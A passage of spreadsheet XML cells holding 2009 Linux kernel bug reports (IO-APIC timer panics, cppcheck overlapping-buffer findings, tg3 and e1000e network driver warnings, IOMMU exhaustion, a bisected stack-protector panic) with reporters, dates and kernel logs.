    <t>Created attachment 20718 [details] dmesg with acpi=debug Last working kernel version: 2.6.29-rc8-gitsomething Hardware: Tyan K8W Motherboard with 2 1.8GHz Dual Core Opterons with 2GB Ram for each node. The Motherboard uses the AMD 8xxx chipsets for AGP, PCI-X and Southbridge. Software: Debian unstable, 64bit. The kernel crashes with the following message (and a backtrace afterwards): [ 0.008000] ENABLING IO-APIC IRQs [ 0.008000] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0 [ 0.008000] ..MP-BIOS bug: 8254 timer not connected to IO-APIC [ 0.008000] ...trying to set up timer (IRQ0) through the 8259A ... [ 0.008000] ..... (found apic 0 pin 0) ... [ 0.008000] ....... failed. [ 0.008000] ...trying to set up timer as Virtual Wire IRQ... [ 0.008000] ..... failed. [ 0.008000] ...trying to set up timer as ExtINT IRQ... [ 0.008000] ..... failed :(. [ 0.008000] Kernel panic - not syncing: IO-APIC + timer doesn't work! Boot with apic=debug and send a r. Attached is the complete dmesg as capture via serial-console (and with acpi=debug).</t>
  </si>
  <si>
    <t>found overlapping data buffer address</t>
  </si>
  <si>
    <t>2009-03-28 23:47 UTC</t>
  </si>
  <si>
    <t>Martin Ettl</t>
  </si>
  <si>
    <t>2012-05-30 15:03 UTC</t>
  </si>
  <si>
    <t>Hi, i found a possible error in the souce code in file linux-2.6.29/arch/ia64/sn/kernel/io_common.c at line 443 look at line 443: sprintf(address, "%s^%d", address, geo_slot(geoid)); I found this by using a static code analysis tool (cppcheck) report generated by cppcheck: [linux-2.6.29/arch/ia64/sn/kernel/io_common.c:443]: (error) Overlapping data buffer address Best regards Ettl Martin</t>
  </si>
  <si>
    <t>Overlapping data buffer</t>
  </si>
  <si>
    <t>2009-03-28 23:57 UTC</t>
  </si>
  <si>
    <t>Hi, i detected two issues in the s390 architecture source code: My static code analysis tool (cppcheck) says: [linux-2.6.29/arch/s390/kernel/early.c:117]: (error) Overlapping data buffer defsys_cmd [linux-2.6.29/arch/s390/kernel/early.c:111]: (error) Overlapping data buffer defsys_cmd look into the code: .... sprintf(defsys_cmd, "%s EW %.5X-%.5X", defsys_cmd, sinitrd_pfn, einitrd_pfn); } #endif sprintf(defsys_cmd, "%s EW MINSIZE=%.7iK PARMREGS=0-13", defsys_cmd, min_size); .... The buffer does overlapp, which can lead to a wrong memory! Best regards Ettl Martin</t>
  </si>
  <si>
    <t>WARNING: at lib/dma-debug.c:539 check_sync+0xe9/0x341() (Not tainted)</t>
  </si>
  <si>
    <t>2009-03-29 11:43 UTC</t>
  </si>
  <si>
    <t>2010-01-19 21:43 UTC</t>
  </si>
  <si>
    <t>------------[ cut here ]------------ WARNING: at lib/dma-debug.c:539 check_sync+0xe9/0x341() (Not tainted) Hardware name: HP Compaq nx6110 (PY501EA#AB9) b44 0000:02:0e.0: DMA-API: device driver tries to sync DMA memory it has not allocated [device address</t>
  </si>
  <si>
    <t>linux-2.6.29/drivers/isdn/mISDN/dsp_pipeline.c</t>
  </si>
  <si>
    <t>2009-03-29 13:39 UTC</t>
  </si>
  <si>
    <t>2012-05-30 15:04 UTC</t>
  </si>
  <si>
    <t>Hi, i detected an issue in follwing code (starting from line 61): *buf = 0; for (; i &lt; elem-&gt;num_args; ++i) len = sprintf(buf, "%sName: %s\n%s%s%sDescription: %s\n" "\n", buf, elem-&gt;args[i].name, elem-&gt;args[i].def ? "Default: " : "", elem-&gt;args[i].def ? elem-&gt;args[i].def : "", elem-&gt;args[i].def ? "\n" : "", elem-&gt;args[i].desc); The memory of variable buf overlapps, using the sprintf statement; This issue was detected with cppcheck (a static code analysis tool). It created the follwing message: [linux-2.6.29/drivers/isdn/mISDN/dsp_pipeline.c:64]: (error) Overlapping data buffer buf Best regards Ettl Martin</t>
  </si>
  <si>
    <t>tg3 transmit timed out when transmitting at high bitrate</t>
  </si>
  <si>
    <t>2009-03-29 18:02 UTC</t>
  </si>
  <si>
    <t>Nikolay</t>
  </si>
  <si>
    <t>2010-01-19 21:57 UTC</t>
  </si>
  <si>
    <t>I have laptop - HP compaq 6715s with broadcom lan card (from lspci): 10:00.0 Ethernet controller: Broadcom Corporation NetLink BCM5906M Fast Ethernet PCI Express (rev 02). I am using slackware 12.2. I compiled kernel 2.6.29 from kernel.org. When I try to copy a file trough the LAN from this laptop with a command like this: scp test.bin 192.168.0.1:/tmp Some MBytes are copied and the transmit stops and there is some messages in dmesg: WARNING: at net/sched/sch_generic.c:226 dev_watchdog+0x1c2/0x1d0() Hardware name: HP Compaq 6715s (GR897ES#ABB) NETDEV WATCHDOG: eth0 (tg3): transmit timed out Modules linked in: snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_devic e snd_pcm_oss snd_mixer_oss ipv6 cpufreq_stats powernow_k8 freq_table ppdev lp parpor t_pc parport fuse snd_hda_codec_analog pcmcia snd_hda_intel snd_hda_codec tg3 fan yen ta_socket snd_hwdep video rsrc_nonstatic rtc_cmos snd_pcm thermal output rtc_core pcm cia_core ati_agp processor libphy rtc_lib psmouse i2c_piix4 agpgart container snd_tim er snd thermal_sys sg serio_raw evdev button battery ac wmi shpchp soundcore k8temp s nd_page_alloc hwmon Pid: 0, comm: swapper Not tainted 2.6.29-smp #1 Call Trace: [&lt;c01294b6&gt;] warn_slowpath+0x86/0xa0 [&lt;c0120030&gt;] ? sd_init_MC+0xa0/0xd0 [&lt;c0120fce&gt;] ? __enqueue_entity+0x8e/0xb0 [&lt;c03a483f&gt;] ? cpumask_next_and+0x1f/0x40 [&lt;c012260a&gt;] ? find_busiest_group+0x18a/0x710 [&lt;c011f8e5&gt;] ? enqueue_task+0x15/0x30 [&lt;c03a94ed&gt;] ? strlcpy+0x1d/0x60 [&lt;c06bfc02&gt;] dev_watchdog+0x1c2/0x1d0 [&lt;c014320b&gt;] ? getnstimeofday+0x4b/0x120 [&lt;c01320f4&gt;] run_timer_softirq+0x124/0x190 [&lt;c06bfa40&gt;] ? dev_watchdog+0x0/0x1d0 [&lt;c012e03a&gt;] __do_softirq+0x8a/0x150 [&lt;c0132614&gt;] ? update_process_times+0x54/0x70 [&lt;c012e13b&gt;] do_softirq+0x3b/0x50 [&lt;c012e47b&gt;] irq_exit+0x3b/0x50 [&lt;c011467e&gt;] smp_apic_timer_interrupt+0x5e/0x90 [&lt;c0103940&gt;] apic_timer_interrupt+0x28/0x30 [&lt;c0109978&gt;] ? default_idle+0x38/0x50 [&lt;c0109b80&gt;] c1e_idle+0x90/0xf0 [&lt;c0109b91&gt;] ? c1e_idle+0xa1/0xf0 [&lt;c0101bea&gt;] cpu_idle+0x4a/0x70 [&lt;c072f705&gt;] rest_init+0x55/0x60 ---[ end trace 0c67ed7bcfb14db6 ]--- tg3: eth0: transmit timed out, resetting tg3: DEBUG: MAC_TX_STATUS[00000008] MAC_RX_STATUS[00000000] tg3: DEBUG: RDMAC_STATUS[00000000] WDMAC_STATUS[00000000] tg3: tg3_stop_block timed out, ofs=1400 enable_bit=2 tg3: tg3_stop_block timed out, ofs=c00 enable_bit=2 tg3: tg3_stop_block timed out, ofs=4800 enable_bit=2 tg3: eth0: Link is down. tg3: eth0: Link is up at 100 Mbps, full duplex. tg3: eth0: Flow control is on for TX and on for RX. After that I cannot send or receive any data through the LAN. There is no ping to anywhere. These commands fix the problem: ip l set dev eth0 down ip l set dev eth0 up And when I execute `scp test.bin 192.168.0.1:/tmp` there is no network again. But this laptop has no problems when receiving data. I can copy with scp from other PC connected to the same lan with 11Mbytes/s. I have search the web to find a solution with no success. I have tried some kernel options like "irqpoll" and "acpi=off" with no success.</t>
  </si>
  <si>
    <t>Bisected - Panic - stack-protector kernel stack corrupted in snd_hda_find_mixer_ctl</t>
  </si>
  <si>
    <t>2.6.29-05102-g0d34fb8</t>
  </si>
  <si>
    <t>2009-03-31 07:56 UTC</t>
  </si>
  <si>
    <t>2012-05-30 15:05 UTC</t>
  </si>
  <si>
    <t>As I had to copy this by hand from the screen, I have omitted the addresses from the stack trace. Kernel Panic - not syncing: Stack-Protector: kernel stack is corrupted in C044F2FE Pid 1 Comm: Swapper Not tainted 2.6.29-05102-g0d34fb8 #1 Call Trace ? printk + 0x23/0x3d panic + 0x4d/0x110 __stack_chk_fail + 0x24/0x60 ? _snd_hda_find_mixer_ctl + 0x6e/0x70 _snd_hda_find_mixer_ctx + 0x6e/0x70 snd_hda_add_vmaster + 0xb4/0xd0 ad198x_build_controls + 0x1bf/0x1e0 snd_hda_codec_build_controls + 0x4d/0x60 azx_probe + 0x6da/0x9b0 ? azx_set_command + 0x0/0x100 ? azx_get_response + 0x0/0x220 ? azx_attach_pcm_stream + 0x0/0x1a0 local_pci_probe + 0x10/0x40 Last working version: 2.6.29-03321-gbe0ea69 First bad commit: 6e15cf04860074ad032e88c306bea656bbdd0f22</t>
  </si>
  <si>
    <t>(atl2) Attansic L2 network card goes down.</t>
  </si>
  <si>
    <t>2009-03-31 17:00 UTC</t>
  </si>
  <si>
    <t>Alexander Koryushkin</t>
  </si>
  <si>
    <t>2012-05-30 15:06 UTC</t>
  </si>
  <si>
    <t>After booting into 2.6.29 kernel my network card goes down without any reasons. But wifi-card(ath5k) seems work fine. madeee:~# lspci |grep Ether 01:00.0 Ethernet controller: Atheros Communications Inc. AR242x 802.11abg Wireless PCI Express Adapter (rev 01) 03:00.0 Ethernet controller: Attansic Technology Corp. L2 100 Mbit Ethernet Adapter (rev a0) madeee:~# modinfo atl2 filename: /lib/modules/2.6.29-eee/kernel/drivers/net/atlx/atl2.ko version: 2.2.3 license: GPL description: Atheros Fast Ethernet Network Driver author: Atheros Corporation &lt;xiong.huang@atheros.com&gt;, Chris Snook &lt;csnook@redhat.com&gt; version: 2.1.3 license: GPL author: Xiong Huang &lt;xiong.huang@atheros.com&gt;, Chris Snook &lt;csnook@redhat.com&gt;, Jay Cliburn &lt;jcliburn@gmail.com&gt; srcversion: CFB3AF8F8486BE7591B8BC5 alias: pci:v00001969d00002048sv*sd*bc*sc*i* depends: vermagic: 2.6.29-eee mod_unload modversions PENTIUMM parm: TxMemSize:Bytes of Transmit Memory (array of int) parm: RxMemBlock:Number of receive memory block (array of int) parm: MediaType:MediaType Select (array of int) parm: IntModTimer:Interrupt Moderator Timer (array of int) parm: FlashVendor:SPI Flash Vendor (array of int) madeee:~# uname -a Linux madeee 2.6.29-eee #2 Mon Mar 30 22:35:22 MSD 2009 i686 GNU/Linux</t>
  </si>
  <si>
    <t>9p: protocol error with wstat</t>
  </si>
  <si>
    <t>2009-03-31 18:18 UTC</t>
  </si>
  <si>
    <t>2010-01-28 14:57 UTC</t>
  </si>
  <si>
    <t>There's a problem with the population of size fields in wstat which causes problems with legacy 9P servers. (from lucho) I installed u9fs to try to reproduce the reported bugs. I didn't go that far, but noticed another bug that makes u9fs sysfatal. When touch /mnt/9/foo u9fs sysfatals, because the stat size that v9fs sends is 0, and it expects the correct value. I am not sure what is the correct fix. Add another character that does almost what 'S' does but also adds the size?</t>
  </si>
  <si>
    <t>9p: Problem with flushing interrupted read operations</t>
  </si>
  <si>
    <t>2009-03-31 18:24 UTC</t>
  </si>
  <si>
    <t>(original bug report from sqweek) I just upgraded to 2.6.29 and now I can't interrupt reads anymore ------ Steps to reproduce, read a blocking synthetic file system such as ACME, and then try to interrupt blocked read with a ^C</t>
  </si>
  <si>
    <t>e1000e mutex contention</t>
  </si>
  <si>
    <t>2009-03-31 19:41 UTC</t>
  </si>
  <si>
    <t>2009-06-05 21:05 UTC</t>
  </si>
  <si>
    <t>I'm seeing the below messages in my /var/log/messages: Mar 31 21:01:32 buk klogd: ------------[ cut here ]------------ Mar 31 21:01:32 buk klogd: WARNING: at drivers/net/e1000e/ich8lan.c:415 e1000_acquire_swflag_ich8lan+0x64/0x130 [e1000e]() Mar 31 21:01:32 buk klogd: Hardware name: Tecra M9 Mar 31 21:01:32 buk klogd: e1000e mutex contention. Owned by process ifplugd (pid 3149), required by process events/0 (pid 7) Mar 31 21:01:32 buk klogd: Modules linked in: tun vboxnetflt vboxdrv xt_time xt_connlimit xt_realm iptable_raw xt_comment xt_recent xt_policy ipt_ULOG ipt_TTL ipt_ttl ipt_REJECT ipt_REDIRECT ipt_NETMAP ipt_MASQUERADE ipt_LOG ipt_ECN ipt_ecn ipt_CLUSTERIP ipt_ah ipt_addrtype nf_nat_tftp nf_nat_snmp_basic nf_nat_sip nf_nat_pptp nf_nat_proto_gre nf_nat_irc nf_nat_h323 nf_nat_ftp nf_nat_amanda ts_kmp nf_conntrack_amanda nf_conntrack_sane nf_conntrack_tftp nf_conntrack_sip nf_conntrack_proto_sctp nf_conntrack_pptp nf_conntrack_proto_gre nf_conntrack_netlink nf_conntrack_netbios_ns nf_conntrack_irc nf_conntrack_h323 nf_conntrack_ftp ipt_set ipt_SET ip_set_nethash ip_set_iptree ip_set_ipporthash ip_set_portmap ip_set_macipmap ip_set_ipmap ip_set_iphash ip_set xt_tcpmss xt_pkttype xt_physdev xt_owner xt_NFQUEUE xt_NFLOG nfnetlink_log xt_multiport xt_MARK xt_mark xt_mac xt_limit xt_length xt_iprange xt_helper xt_hashlimit xt_DSCP xt_dscp xt_dccp xt_conntrack xt_CONNMARK xt_connmark xt_CLASSIFY xt_tcpudp xt_state ipt Mar 31 21:01:32 buk klogd: ble_nat nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_conntrack iptable_mangle nfnetlink iptable_filter ip_tables x_tables autofs4 aes_i586 aes_generic af_packet bridge stp bnep sco rfcomm l2cap ipv6 binfmt_misc loop dm_mirror dm_region_hash dm_log dm_mod cpufreq_ondemand cpufreq_conservative cpufreq_powersave acpi_cpufreq freq_table nvram toshiba snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep snd_seq_dummy snd_seq_oss arc4 snd_seq_midi_event ecb snd_seq snd_seq_device iwlagn iwlcore pcmcia usbhid btusb snd_pcm_oss yenta_socket snd_pcm rsrc_nonstatic hid sdhci_pci bluetooth snd_timer snd_mixer_oss sdhci mmc_core e1000e led_class pcmcia_core intel_agp snd mac80211 toshiba_acpi agpgart tpm_infineon soundcore tpm iTCO_wdt iTCO_vendor_support snd_page_alloc cfg80211 rfkill tpm_bios video thermal uhci_hcd ehci_hcd output pcspkr battery joydev processor button ac input_polldev evdev rtc_cmos sr_mod sg usbcore sbp2 ohci1394 ieee1394 ata_piix ahci libata sd_mod scsi_mod crc_t10d Mar 31 21:01:32 buk klogd: xt3 jbd Mar 31 21:01:32 buk klogd: Pid: 7, comm: events/0 Tainted: G W 2.6.29-desktop-1mnb #1 Mar 31 21:01:32 buk klogd: Call Trace: Mar 31 21:01:32 buk klogd: [&lt;c0133ec3&gt;] warn_slowpath+0x73/0xd0 Mar 31 21:01:32 buk klogd: [&lt;c013996f&gt;] ? irq_exit+0x3f/0xa0 Mar 31 21:01:32 buk klogd: [&lt;c011704e&gt;] ? smp_apic_timer_interrupt+0x5e/0x90 Mar 31 21:01:32 buk klogd: [&lt;c013996f&gt;] ? irq_exit+0x3f/0xa0 Mar 31 21:01:32 buk klogd: [&lt;c01047c0&gt;] ? apic_timer_interrupt+0x28/0x30 Mar 31 21:01:32 buk klogd: [&lt;f84e7f24&gt;] e1000_acquire_swflag_ich8lan+0x64/0x130 [e1000e] Mar 31 21:01:32 buk klogd: [&lt;f84ecedc&gt;] e1000e_read_phy_reg_igp+0x1c/0x70 [e1000e] Mar 31 21:01:32 buk klogd: [&lt;f84ed138&gt;] e1000e_phy_has_link_generic+0x48/0xe0 [e1000e] Mar 31 21:01:32 buk klogd: [&lt;f84ebd2c&gt;] e1000e_check_for_copper_link+0x2c/0x80 [e1000e] Mar 31 21:01:32 buk klogd: [&lt;f84f1ce4&gt;] e1000_has_link+0x54/0xe0 [e1000e] Mar 31 21:01:32 buk klogd: [&lt;f84f3d6d&gt;] e1000_watchdog_task+0x2d/0x740 [e1000e] Mar 31 21:01:32 buk klogd: [&lt;f84f3d40&gt;] ? e1000_watchdog_task+0x0/0x740 [e1000e] Mar 31 21:01:32 buk klogd: [&lt;c014535d&gt;] run_workqueue+0x8d/0x150 Mar 31 21:01:32 buk klogd: [&lt;c014934a&gt;] ? prepare_to_wait+0x3a/0x70 Mar 31 21:01:32 buk klogd: [&lt;c01454a8&gt;] worker_thread+0x88/0xf0 Mar 31 21:01:32 buk klogd: [&lt;c01490f0&gt;] ? autoremove_wake_function+0x0/0x50 Mar 31 21:01:32 buk klogd: [&lt;c0145420&gt;] ? worker_thread+0x0/0xf0 Mar 31 21:01:32 buk klogd: [&lt;c0148d7c&gt;] kthread+0x3c/0x70 Mar 31 21:01:32 buk klogd: [&lt;c0148d40&gt;] ? kthread+0x0/0x70 Mar 31 21:01:32 buk klogd: [&lt;c0104913&gt;] kernel_thread_helper+0x7/0x14 Mar 31 21:01:32 buk klogd: ---[ end trace 5219e273eb3265ae ]--- they reappear every 1-4 hours they are present at least since 2.6.29 rc6 this is happening even when the ethernet interface is not plugged in I donn't observe anything bad related to these messages, but they do make me nervous this is with the Mandriva Linux (cooker) kernel, I haven't tried (and don't plan to unless forced) with vanilla one with nvidia unloaded for the purists: Mar 30 20:12:31 buk klogd: ------------[ cut here ]------------ Mar 30 20:12:31 buk klogd: WARNING: at drivers/net/e1000e/ich8lan.c:415 e1000_acquire_swflag_ich8lan+0x64/0x130 [e1000e]() Mar 30 20:12:31 buk klogd: Hardware name: Tecra M9 Mar 30 20:12:31 buk klogd: e1000e mutex contention. Owned by process (pid 3149), required by process events/0 (pid 7) Mar 30 20:12:31 buk klogd: Modules linked in: xt_time xt_connlimit xt_realm iptable_raw xt_comment xt_recent xt_policy ipt_ULOG ipt_TTL ipt_ttl ipt_REJECT ipt_REDIRECT ipt_NETMAP ipt_MASQUERADE ipt_LOG ipt_ECN ipt_ecn ipt_CLUSTERIP ipt_ah ipt_addrtype nf_nat_tftp nf_nat_snmp_basicnf_nat_sip nf_nat_pptp nf_nat_proto_gre nf_nat_irc nf_nat_h323 nf_nat_ftp nf_nat_amanda ts_kmp nf_conntrack_amanda nf_conntrack_sane nf_conntrack_tftp nf_conntrack_sip nf_conntrack_proto_sctp nf_conntrack_pptp nf_conntrack_proto_gre nf_conntrack_netlink nf_conntrack_netbios_ns nf_conntrack_irc nf_conntrack_h323 nf_conntrack_ftp ipt_set ipt_SET ip_set_nethash ip_set_iptree ip_set_ipporthash ip_set_portmap ip_set_macipmap ip_set_ipmap ip_set_iphash ip_set xt_tcpmss xt_pkttype xt_physdev xt_owner xt_NFQUEUE xt_NFLOG nfnetlink_log xt_multiport xt_MARK xt_mark xt_mac xt_limit xt_length xt_iprange xt_helper xt_hashlimit xt_DSCP xt_dscp xt_dccp xt_conntrack xt_CONNMARK xt_connmark xt_CLASSIFY xt_tcpudpxt_state iptable_nat nf_nat nf_conn Mar 30 20:12:31 buk klogd: rack_ipv4 nf_defrag_ipv4 nf_conntrack iptable_mangle nfnetlink iptable_filter ip_tables x_tables autofs4 aes_i586aes_generic af_packet bridge stp bnep sco rfcomm l2cap ipv6 binfmt_misc loop dm_mirror dm_region_hash dm_log dm_mod cpufreq_ondemand cpufreq_conservative cpufreq_powersave acpi_cpufreq freq_table nvram toshiba snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep snd_seq_dummy snd_seq_oss arc4 snd_seq_midi_event ecb snd_seq snd_seq_device iwlagn iwlcore pcmcia usbhid btusb snd_pcm_oss yenta_socket snd_pcm rsrc_nonstatic hid sdhci_pci bluetooth snd_timer snd_mixer_oss sdhci mmc_core e1000e led_class pcmcia_core intel_agp snd mac80211 toshiba_acpi agpgart tpm_infineon soundcore tpm iTCO_wdt iTCO_vendor_support snd_page_alloc cfg80211 rfkill tpm_bios video thermal uhci_hcd ehci_hcd output pcspkr battery joydev processor button ac input_polldev evdev rtc_cmos sr_mod sg usbcore sbp2 ohci1394 ieee1394 ata_piix ahci libata sd_mod scsi_mod crc_t10dif ext3 jbd Mar 30 20:12:31 buk klogd: Pid: 7, comm: events/0 Not tainted 2.6.29-desktop-1mnb #1 Mar 30 20:12:31 buk klogd: Call Trace: Mar 30 20:12:31 buk klogd: [&lt;c0133ec3&gt;] warn_slowpath+0x73/0xd0 Mar 30 20:12:31 buk klogd: [&lt;c013df5d&gt;] ? run_timer_softirq+0x1d/0x200 Mar 30 20:12:31 buk klogd: [&lt;c0155e03&gt;] ? tick_dev_program_event+0x33/0xc0 Mar 30 20:12:31 buk klogd: [&lt;c0155eeb&gt;] ? tick_program_event+0x2b/0x40 Mar 30 20:12:31 buk klogd: [&lt;f84e7f24&gt;] e1000_acquire_swflag_ich8lan+0x64/0x130 [e1000e] Mar 30 20:12:31 buk klogd: [&lt;f84ecedc&gt;] e1000e_read_phy_reg_igp+0x1c/0x70 [e1000e] Mar 30 20:12:31 buk klogd: [&lt;f84ed138&gt;] e1000e_phy_has_link_generic+0x48/0xe0 [e1000e] Mar 30 20:12:31 buk klogd: [&lt;f84ebd2c&gt;] e1000e_check_for_copper_link+0x2c/0x80 [e1000e] Mar 30 20:12:31 buk klogd: [&lt;f84f1ce4&gt;] e1000_has_link+0x54/0xe0 [e1000e] Mar 30 20:12:31 buk klogd: [&lt;f84f3d6d&gt;] e1000_watchdog_task+0x2d/0x740 [e1000e] Mar 30 20:12:31 buk klogd: [&lt;c0194300&gt;] ? vmstat_update+0x0/0x30 Mar 30 20:12:31 buk klogd: [&lt;f84f3d40&gt;] ? e1000_watchdog_task+0x0/0x740 [e1000e] Mar 30 20:12:31 buk klogd: [&lt;c014535d&gt;] run_workqueue+0x8d/0x150 Mar 30 20:12:31 buk klogd: [&lt;c014934a&gt;] ? prepare_to_wait+0x3a/0x70 Mar 30 20:12:31 buk klogd: [&lt;c01454a8&gt;] worker_thread+0x88/0xf0 Mar 30 20:12:31 buk klogd: [&lt;c01490f0&gt;] ? autoremove_wake_function+0x0/0x50 Mar 30 20:12:31 buk klogd: [&lt;c0145420&gt;] ? worker_thread+0x0/0xf0 Mar 30 20:12:31 buk klogd: [&lt;c0148d7c&gt;] kthread+0x3c/0x70 Mar 30 20:12:31 buk klogd: [&lt;c0148d40&gt;] ? kthread+0x0/0x70 Mar 30 20:12:31 buk klogd: [&lt;c0104913&gt;] kernel_thread_helper+0x7/0x14 Mar 30 20:12:31 buk klogd: ---[ end trace 5219e273eb32659c ]---</t>
  </si>
  <si>
    <t>PCI-DMA: Out of IOMMU space</t>
  </si>
  <si>
    <t>2.6.29-gentoo</t>
  </si>
  <si>
    <t>2009-04-03 09:30 UTC</t>
  </si>
  <si>
    <t>optimusgd</t>
  </si>
  <si>
    <t>2010-11-11 19:38 UTC</t>
  </si>
  <si>
    <t>Created attachment 20789 [details] hwreport generated info After some IO activity the "PCI-DMA: Out of IOMMU space" message appear. 2.6.28-gentoo-r4 work ok, so it is regression. Dmesg fragments: Apr 3 13:38:46 rngmhpamd sata_nv 0000:00:05.0: PCI-DMA: Out of IOMMU space for 4096 bytes Apr 3 13:38:46 rngmhpamd sata_nv 0000:00:05.0: PCI-DMA: Out of IOMMU space for 4096 bytes Apr 3 13:38:46 rngmhpamd ata1: EH in SWNCQ mode,QC:qc_active 0x1 sactive 0x1 Apr 3 13:38:46 rngmhpamd ata1: SWNCQ:qc_active 0x0 defer_bits 0x0 last_issue_tag 0xfafbfcfd Apr 3 13:38:46 rngmhpamd dhfis 0x0 dmafis 0x0 sdbfis 0x0 Apr 3 13:38:46 rngmhpamd ata1: ATA_REG 0x50 ERR_REG 0x0 Apr 3 13:38:46 rngmhpamd ata1: tag : dhfis dmafis sdbfis sacitve Apr 3 13:38:46 rngmhpamd ata1.00: exception Emask 0x0 SAct 0x1 SErr 0x0 action 0x6 Apr 3 13:38:46 rngmhpamd ata1.00: cmd 60/08:00:00:00:00/00:00:00:00:00/40 tag 0 ncq 4096 in Apr 3 13:38:46 rngmhpamd res 50/00:00:00:00:00/00:45:00:00:00/a0 Emask 0x40 (internal error) Apr 3 13:38:46 rngmhpamd ata1.00: status: { DRDY } Apr 3 13:38:46 rngmhpamd ata1: hard resetting link Apr 3 13:38:47 rngmhpamd ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 300) Apr 3 13:38:47 rngmhpamd ata1.00: configured for UDMA/100 Apr 3 13:38:47 rngmhpamd ata1: EH complete Apr 3 13:38:47 rngmhpamd sd 1:0:0:0: [sdb] 488397168 512-byte hardware sectors: (250 GB/232 GiB) Apr 3 13:38:47 rngmhpamd sd 1:0:0:0: [sdb] Write Protect is off Apr 3 13:38:47 rngmhpamd sd 1:0:0:0: [sdb] Mode Sense: 00 3a 00 00 Apr 3 13:38:47 rngmhpamd sd 1:0:0:0: [sdb] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA Apr 3 13:38:47 rngmhpamd sd 1:0:0:0: [sdb] 488397168 512-byte hardware sectors: (250 GB/232 GiB) Apr 3 13:38:47 rngmhpamd sd 1:0:0:0: [sdb] Write Protect is off Apr 3 13:38:47 rngmhpamd sd 1:0:0:0: [sdb] Mode Sense: 00 3a 00 00 Apr 3 13:38:47 rngmhpamd sd 1:0:0:0: [sdb] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA And Mar 31 20:56:18 rngmhpamd ehci_hcd 0000:00:02.1: PCI-DMA: Out of IOMMU space for 4608 bytes Mar 31 20:56:18 rngmhpamd ehci_hcd 0000:00:02.1: PCI-DMA: Out of IOMMU space for 69632 bytes Mar 31 20:56:48 rngmhpamd usb 1-4: reset high speed USB device using ehci_hcd and address 8 Mar 31 20:56:48 rngmhpamd ehci_hcd 0000:00:02.1: PCI-DMA: Out of IOMMU space for 11776 bytes Mar 31 20:56:48 rngmhpamd ehci_hcd 0000:00:02.1: PCI-DMA: Out of IOMMU space for 69632 bytes Mar 31 20:57:19 rngmhpamd usb 1-4: reset high speed USB device using ehci_hcd and address 8 Mar 31 20:57:19 rngmhpamd ehci_hcd 0000:00:02.1: PCI-DMA: Out of IOMMU space for 11776 bytes Mar 31 20:57:19 rngmhpamd ehci_hcd 0000:00:02.1: PCI-DMA: Out of IOMMU space for 69632 bytes Mar 31 20:57:50 rngmhpamd usb 1-4: reset high speed USB device using ehci_hcd and address 8 Mar 31 20:57:50 rngmhpamd ehci_hcd 0000:00:02.1: PCI-DMA: Out of IOMMU space for 11776 bytes Mar 31 20:57:50 rngmhpamd ehci_hcd 0000:00:02.1: PCI-DMA: Out of IOMMU space for 69632 bytes Mar 31 20:58:21 rngmhpamd usb 1-4: reset high speed USB device using ehci_hcd and address 8 Mar 31 20:58:21 rngmhpamd ehci_hcd 0000:00:02.1: PCI-DMA: Out of IOMMU space for 11776 bytes Mar 31 20:58:21 rngmhpamd ehci_hcd 0000:00:02.1: PCI-DMA: Out of IOMMU space for 69632 bytes Mar 31 20:58:52 rngmhpamd usb 1-4: reset high speed USB device using ehci_hcd and address 8 Mar 31 20:58:52 rngmhpamd ehci_hcd 0000:00:02.1: PCI-DMA: Out of IOMMU space for 11776 bytes Mar 31 20:58:52 rngmhpamd ehci_hcd 0000:00:02.1: PCI-DMA: Out of IOMMU space for 69632 bytes Mar 31 20:59:01 rngmhpamd sd 8:0:0:0: [sdc] Unhandled error code Mar 31 20:59:01 rngmhpamd sd 8:0:0:0: [sdc] Result: hostbyte=0x07 driverbyte=0x00 Mar 31 20:59:01 rngmhpamd end_request: I/O error, dev sdc, sector 1137 Mar 31 20:59:01 rngmhpamd __ratelimit: 246 callbacks suppressed</t>
  </si>
  <si>
    <t>kernel 2.6.28 doesn't boot - bisected - dell inspiron 2650</t>
  </si>
  <si>
    <t>2.6.28, 2.6.29</t>
  </si>
  <si>
    <t>2009-04-03 14:20 UTC</t>
  </si>
  <si>
    <t>Tiago Requeijo</t>
  </si>
  <si>
    <t>2009-09-24 21:41 UTC</t>
  </si>
  <si>
    <t>The boot process on a Dell Inspiron 2650 stops at the point on the image on the link below. The same happens with 2.6.29. Booting with acpi=off works. Previous kernel versions worked fine (&lt;2.6.28) The output of lspci is: 00:00.0 Host bridge: Intel Corporation 82845 845 [Brookdale] Chipset Host Bridge (rev 05) 00:01.0 PCI bridge: Intel Corporation 82845 845 [Brookdale] Chipset AGP Bridge (rev 05) 00:1d.0 USB Controller: Intel Corporation 82801CA/CAM USB Controller #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation 82801CA/CAM USB Controller #2 (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev 42) 00:1f.0 ISA bridge: Intel Corporation 82801CAM ISA Bridge (LPC) (rev 02) 00:1f.1 IDE interface: Intel Corporation 82801CAM IDE U100 Controller (rev 02) 00:1f.3 SMBus: Intel Corporation 82801CA/CAM SMBus Controller (rev 02) 00:1f.5 Multimedia audio controller: Intel Corporation 82801CA/CAM AC'97 Audio Controller (rev 02) 00:1f.6 Modem: Intel Corporation 82801CA/CAM AC'97 Modem Controller (rev 02) 01:00.0 VGA compatible controller: nVidia Corporation NV11 [GeForce2 Go] (rev b2) 02:01.0 Ethernet controller: 3Com Corporation 3c905C-TX/TX-M [Tornado] (rev 78) 02:04.0 CardBus bridge: O2 Micro, Inc. OZ601/6912/711E0 CardBus/SmartCardBus Controller Bootscreen image: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/327499/comments/1 output of lspci -vv: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/327499/comments/2 I initially submitted this bug to ubuntu's bugtracker at https://bugs.launchpad.net/ubuntu/+source/linux/+bug/327499. There is someone else on that page with the same exact problem on a similar laptop.</t>
  </si>
  <si>
    <t>2.6.28.9 causes init to segfault on Debian etch; 2.6.28.8 OK</t>
  </si>
  <si>
    <t>2009-04-05 13:04 UTC</t>
  </si>
  <si>
    <t>2010-01-25 15:00 UTC</t>
  </si>
  <si>
